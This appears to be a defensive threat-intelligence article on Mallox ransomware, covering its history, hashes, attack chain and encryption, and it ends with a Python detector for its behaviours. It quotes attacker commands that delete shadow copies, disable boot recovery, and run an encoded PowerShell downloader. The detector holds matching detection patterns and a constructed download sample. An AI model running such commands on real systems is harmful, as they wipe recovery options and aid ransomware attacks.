Mallox ransomware, also identified by names such as Fargo, TargetCompany, and Tohnichi, is a significant and evolving threat in the cybersecurity landscape. Operating as a Ransomware-as-a-Service (RaaS), Mallox has been active since June 2021, showcasing continuous development and an increasing number of detected samples. This article provides a comprehensive technical overview of Mallox, tracing its history, detailing its operational methods, analyzing its complex encryption schemes, and outlining effective defense strategies. The primary goal is to equip security professionals with the necessary knowledge to combat this persistent and adaptive threat.
Mallox ransomware's origins trace back to June 2021, initially characterized by attacks targeting specific organizations. Early variants exhibited unique naming conventions, with samples tailored to victims using distinct file extensions such as .architek, .avast, .bitenc, .exploit, .FARGO2, .FARGO3 and .xollam, or appending the victim's name as the extension. This period marked its emergence as a targeted threat, focusing on bespoke attacks.
| Filename | Extension | MD5 | First Submission |
|---|---|---|---|
| avast.exe | .avast | 05d549a84583747d88f874b4b1f16787 | May 31, 2021 |
| architek.exe | .architek | 0e1c42ddc08d0d6769b02e1b8b1c7653 | Jun 1, 2021 |
| iis6.exe | .[victim_name] | e6147c32f31e0752c0f33c19aaf8c283 | Aug 17, 2021 |
| cman.exe | .[victim_name] | 0b213a0e55f6b99c8d17ef6e80141589 | Sep 2, 2021 |
| sqlserver.exe | .exploit | 534954d4e6814dbb44eb47179b83d942 | Jan 7, 2022 |
| sqlserver.exe | .FARGO2 | 5c39447a2c3349926f928033e0a495d3 | Jan 26, 2022 |
| sqlserver.exe | .FARGO3 | ac3e99d8c57ba639478421e9d89f47dc | Mar 24, 2022 |
| sqlserver.exe | .mallox | 21c257a72f0b53254d78b2d2963d024f | Jul 20, 2022 |
| sqlserver.exe (v1A) | .mallox | 778a451d9c119597645ba4b6c1d6c406 | Aug 04, 2022 |
| sqlserver.exe (v1B) | .mallox | c54a665f5179a44d7c6789038ff53753 | Aug 15, 2022 |
| sqlserver.exe (v1C) | .mallox | c8b5e99c539f7b711ba6b6577f1f834f | Aug 24, 2022 |
| sqlserver.exe (v1D) | .mallox | 672b45154c56336c9f5d42a505f62338 | Sep 02, 2022 |
| sqlserver.exe (v1E) | .mallox | 96170b3ff79d5756244c514af5b80f08 | Sep 04, 2022 |
| sqlserver.exe (v1F) | .mallox | a68a8fd675454f0921b63a45b513c2a3 | Sep 06, 2022 |
| sqlserver.exe (v1G) | .mallox | 90d4333c3a82b65b7b5d2d6516b45389 | Sep 08, 2022 |
A significant shift occurred around 2022, potentially indicating a change in ownership or operational strategy. The ransomware adopted the more generic "Mallox" branding and began to be offered under a Ransomware-as-a-Service (RaaS) model. This transition was marked by advertisements on dark web forums, such as RAMP, seeking experienced affiliates. This period marked the beginning of multi-extortion techniques, with operators threatening to publish stolen victim data.
Since 2022 the RaaS has used affiliate IDs hardcoded in the trojan's body and reported to the C&C server via the HTTP parameter "user=".
Interviews with individuals claiming to be associated with Mallox have provided further insights, although the veracity of these claims remains subject to scrutiny. These interviews suggest a focus on targeting larger, wealthier organizations and a preference for working with experienced penetration testers.
Mallox ransomware employs a sophisticated multi-stage attack chain, leveraging a combination of techniques to compromise, persist, and ultimately encrypt victim data.
Initial Access: A common infection vector is the exploitation of vulnerabilities in internet-facing Microsoft SQL (MS-SQL) and PostgreSQL servers. The attackers often run brute-force or dictionary attacks against weak credentials on these database servers. Other observed methods include spam campaigns with malicious attachments and exploitation of vulnerabilities in software such as IP-Guard.
Payload Delivery: After gaining initial access, the attackers typically use PowerShell scripts to download and execute subsequent payloads. This often involves a multi-stage process, with an initial script downloading a first-stage payload, which then retrieves the second-stage payload (the Mallox ransomware itself). A common command sequence used is: cmd /c powershell.exe -ep bypass -e [Base64 Encoded PowerShell Script]
The threat actors also download a file named system.bat and save it as tzt.bat. The file tzt.bat is then used to create a user named SystemHelp and enable Remote Desktop Protocol (RDP).
Defense Evasion & Anti-Analysis: Mallox implements several techniques to evade detection and hinder analysis:
* Disabling Windows Recovery Environment: Commands like bcdedit /set {default} bootstatuspolicy ignoreallfailures and bcdedit /set {default} recoveryenabled no are used to prevent system recovery.
* Deletion of Shadow Copies: vssadmin delete shadows /all /quiet is executed to eliminate shadow copies, preventing data restoration.
* Stopping and removing SQL-related services.
* Clearing application, security, setup, and system event logs.
* Modifying file permissions using tools such as takeown.exe, cmd.exe, and icacls.exe.
* Termination of Specific Processes: The ransomware terminates processes associated with security software, databases, and other applications that might interfere with encryption.
* Bypassing Raccine: If the Raccine anti-ransomware tool is present, Mallox deletes its registry key to bypass it.
Encryption Process: Mallox employs a complex, multi-layered encryption scheme that has evolved over time:
* Original Version: Used Elliptic Curve Cryptography (ECC) for key generation, Elliptic-curve Diffie–Hellman (ECDH) for key agreement, and ChaCha20 for data encryption. A "technical buffer" was used to store cryptographic information.
* Recent Versions: Shifted to using master public keys, CTR_DRBG for key generation, and AES-256 in GCM mode for encryption. The technical buffer structure has been expanded. The vulnerability in the use of RtlGenRandom was fixed in v1F.
* Drive Enumeration: Mallox enumerates drives and excludes specific folders and file extensions from encryption to maintain system stability.
Communication with C&C Server: Before and after encryption, Mallox communicates with the attacker's command and control (C&C) server. Information transmitted includes the victim ID, computer name, domain name, encrypted disks, and external IP address.
Mallox ransomware's targeting strategy is characterized by a focus on financial gain and, potentially, geopolitical motivations.
Financial Gain: The primary motivation is financial, with ransom demands ranging from thousands to tens of thousands of dollars. The operators specifically target companies with revenues exceeding $10 million, indicating a focus on maximizing profits.
Espionage (Potential): While primarily financially driven, the targeting of specific industries (like manufacturing, professional/legal services, and wholesale/retail) could suggest a secondary interest in data theft for espionage purposes.
Targeted Industries: Mallox has been observed targeting a broad range of sectors, including manufacturing, professional and legal services, and wholesale/retail. This suggests an opportunistic approach, targeting organizations with weak security postures regardless of their specific industry.
Geographic Distribution: While attacks have been observed globally, certain regions, including Brazil, Vietnam, and China, have seen higher concentrations of victims. However, the RaaS model allows affiliates to target organizations in various locations, making the geographical distribution dynamic. The operators specifically target organizations in the US, CA, AU, UK, and DE, explicitly avoiding education, government, and healthcare.
Mallox ransomware has been linked to several notable attack campaigns:
Mid-2021: Initial attacks targeting specific organizations, often using customized file extensions.
2022: Shift to the "Mallox" branding and the adoption of the RaaS model. Increased activity and the emergence of a data leak site.
July 2023: A significant increase (174%) in Mallox activity was reported, highlighting the growing threat.
Late 2023 - Early 2024: Continued activity, with reports of attacks globally across various industries. A Linux variant has emerged from around mid-2023.
November 2024: A high-profile attack occurred on Blue Yonder, a major supply chain management solutions provider.
December 2024: A new ransomware group, FunkSec, emerges and starts to take responsibility for a high number of attacks using the ransomware.
Protecting against Mallox ransomware requires a multi-layered approach, focusing on prevention, detection, and response:
Secure Remote Access: Implement strong passwords and multi-factor authentication (MFA) for all remote access points, particularly RDP and VPN connections.
Patching and Vulnerability Management: Regularly update all software, especially internet-facing applications like MS-SQL servers, to address known vulnerabilities.
Endpoint Protection: Deploy robust endpoint security solutions, including Endpoint Detection and Response (EDR) or Extended Detection and Response (XDR), with ransomware protection capabilities enabled.
Network Security: Implement network segmentation to limit the lateral movement of attackers within the network. Use firewalls and intrusion prevention systems (IPS) to monitor and block malicious traffic.
Security Awareness Training: Educate employees about phishing and social engineering techniques to prevent initial access via malicious emails.
Data Backup and Recovery: Regularly back up critical data to secure, offline locations. Test the restoration process to ensure data can be recovered quickly in case of an attack.
Threat Hunting: Proactively hunt for indicators of compromise (IOCs) within the network, focusing on unusual behavior, defense evasion techniques, and lateral movement.
Focus on Detection: Prioritize detecting key behaviors like Ingress Tool Transfer, Inhibit System Recovery, and Data Encrypted for Impact. Specifically:
* Monitor for PowerShell or Cmd.exe downloading data with "IWR" or "Invoke-WebRequest" and "DownloadData".
* Monitor command-line activity for vssadmin deleting shadows or PowerShell using Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}.
* Detect suspicious data exfiltration and ransomware-like file encryption patterns.
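As an added example that is not part of the original article, the following Python runs the detection logic described in this section and in the Defense Evasion section above over constructed process command lines: it flags the shadow-copy and bcdedit commands, and it decodes the base64/UTF-16LE payload behind powershell -e so that IWR, Invoke-WebRequest or DownloadData hidden inside the encoded loader are still caught. The sample command lines, the rule names and the decode_encoded_command/classify/scan helpers are assumptions built from the article's own indicators, not data from any real incident.

```python
import base64
import re

def encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe -e expects it: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample command lines (not from the article or any real incident), shaped like the CommandLine field of an EDR/Sysmon process-creation event.
SAMPLE_EVENTS = [
    "vssadmin delete shadows /all /quiet",
    "bcdedit /set {default} recoveryenabled no",
    "bcdedit /set {default} bootstatuspolicy ignoreallfailures",
    'powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}"',
    "cmd /c powershell.exe -ep bypass -e " + encode_ps("IWR http://example.invalid/a.exe -OutFile a.exe"),
    "powershell.exe -Command Get-Process",   # benign
    "vssadmin list shadows",                 # benign
]

# Behaviours the article singles out, labelled with the names it uses for them.
RULES = [
    ("Inhibit System Recovery", re.compile(r"vssadmin.*delete\s+shadows", re.I)),
    ("Inhibit System Recovery", re.compile(r"bcdedit.*(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)", re.I)),
    ("Inhibit System Recovery", re.compile(r"Win32_Shadowcopy.*\.Delete\(\)", re.I)),
    ("Ingress Tool Transfer", re.compile(r"\b(IWR|Invoke-WebRequest|DownloadData)\b", re.I)),
]

def decode_encoded_command(cmdline: str) -> str:
    """Return the script hidden behind -e/-enc/-EncodedCommand, or '' if there is none."""
    m = re.search(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def classify(cmdline: str) -> list:
    """Name the behaviours a command line shows, scanning its decoded -e payload as well."""
    decoded = decode_encoded_command(cmdline)
    hits = [name for name, pat in RULES if pat.search(cmdline + " " + decoded)]
    hits = list(dict.fromkeys(hits))  # keep order, drop duplicate names
    # Execution-policy bypass plus an encoded payload is the loader shape the article quotes.
    if decoded and re.search(r"-ep\s+bypass", cmdline, re.I):
        hits.append("Encoded PowerShell loader")
    return hits

def scan(cmdlines) -> list:
    """Return (cmdline, behaviours) for every command line that trips at least one rule."""
    return [(cmd, classify(cmd)) for cmd in cmdlines if classify(cmd)]
```

Running scan(SAMPLE_EVENTS) flags the five malicious lines and leaves the two benign ones untouched; the same rules port directly to an EDR query or Sigma rule.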
Mallox ransomware represents a persistent and evolving threat, driven by a financially motivated RaaS model. Its sophisticated attack techniques, including the exploitation of MS-SQL server vulnerabilities, multi-stage payload delivery, and advanced encryption schemes, require organizations to implement robust, multi-layered defenses. Continuous monitoring, proactive threat hunting, and a strong focus on security fundamentals, such as patching and secure remote access, are crucial for mitigating the risk posed by Mallox and other similar ransomware threats. The ongoing development of new variants, including a Linux version, underscores the need for constant vigilance and adaptation in the face of this evolving threat landscape.
Arun KL is a cybersecurity professional with 15+ years of experience in IT infrastructure, cloud security, vulnerability management, Penetration Testing, security operations, and incident response. He is adept at designing and implementing robust security solutions to safeguard systems and data. Arun holds multiple industry certifications including CCNA, CCNA Security, RHCE, CEH, and AWS Security.